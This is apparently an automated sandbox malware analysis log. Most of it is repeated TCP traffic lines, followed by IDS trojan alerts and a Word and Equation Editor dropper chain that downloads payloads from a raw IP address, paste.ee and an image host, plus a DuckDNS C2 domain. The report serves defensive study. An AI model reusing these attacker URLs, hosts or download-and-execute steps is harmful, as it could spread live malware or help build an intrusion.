                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2047750 ET TROJAN Base64 Encoded MZ In Image 172.67.215.45:443 -> 192.168.2.22:49168
                      Source: TrafficSnort IDS: 2018856 ET TROJAN Windows executable base64 encoded 172.67.215.45:443 -> 192.168.2.22:49168
                      Source: TrafficSnort IDS: 2025011 ET TROJAN Powershell commands sent B64 2 172.67.215.45:443 -> 192.168.2.22:49168
                      Source: TrafficSnort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 172.67.215.45:443 -> 192.168.2.22:49168
                      Source: TrafficSnort IDS: 2020423 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1 107.172.31.6:80 -> 192.168.2.22:49169
                      Source: TrafficSnort IDS: 2020424 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M1 107.172.31.6:80 -> 192.168.2.22:49169
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 104.21.84.67 443Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeDomain query: paste.ee
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: sembe.duckdns.org
                      Connects to a pastebin service (likely for C&C)
                      Source: unknownDNS query: name: paste.ee
                      Uses dynamic DNS services
                      Source: unknownDNS query: name: sembe.duckdns.org
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: 10.2.powershell.exe.91e0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.492134092.00000000091E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C054A URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035C054A
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 194.187.251.115:14645
                      Source: antre.vbs.13.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
                      Source: antre.vbs.13.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
                      Source: global trafficHTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.br
                      Source: global trafficHTTP traffic detected: GET /28088/HHRM.txt HTTP/1.1Host: 107.172.31.6Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                      Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
                      Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
                      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: M247GB M247GB
                      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                      Source: global trafficHTTP traffic detected: GET /d/e1cCs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.eeConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /28088/indexphppagenotfound.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.31.6Connection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.22:49167 version: TLS 1.0
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C054A URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035C054A
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E2F14953-7834-4109-8F97-B0AFE5CAF451}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /d/e1cCs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.eeConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.br
                      Source: global trafficHTTP traffic detected: GET /28088/indexphppagenotfound.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.31.6Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /28088/HHRM.txt HTTP/1.1Host: 107.172.31.6Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: global trafficDNS traffic detected: DNS query: paste.ee
                      Source: global trafficDNS traffic detected: DNS query: uploaddeimagens.com.br
                      Source: global trafficDNS traffic detected: DNS query: sembe.duckdns.org
                      Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                      Source: EQNEDT32.EXE, 00000002.00000002.356769287.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.31.6/28088/indexphppagenotfound.gif
                      Source: EQNEDT32.EXE, 00000002.00000002.356769287.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.31.6/28088/indexphppagenotfound.gife
                      Source: EQNEDT32.EXE, 00000002.00000002.356926787.00000000035C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.31.6/28088/indexphppagenotfound.gifj
                      Source: EQNEDT32.EXE, 00000002.00000002.356769287.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.31.6/28088/indexphppagenotfound.gifyyC:
                      Source: wscript.exe, 00000005.00000003.380723170.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.403573136.000000000041C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.405142889.0000000000463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356767117.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.403900333.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.402664845.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401474551.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356753900.000000000040E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356796537.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401153718.00000000003F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400853574.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401474551.000000000040E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356767117.0000000002A64000.00000004.00000020.00020000.00000000.sdmp, indexphppagenotfound[1].gif.2.dr, coinfishingusagegirlsknow.vbs.2.drString found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspx
                      Source: wscript.exe, 00000005.00000002.405142889.0000000000463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.402664845.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401474551.0000000000454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspx70
                      Source: wscript.exe, 00000005.00000003.402664845.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401474551.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.405142889.0000000000454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspxL
                      Source: wscript.exe, 00000005.00000003.380723170.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356767117.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.403900333.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356796537.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400853574.0000000002A83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspxd
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
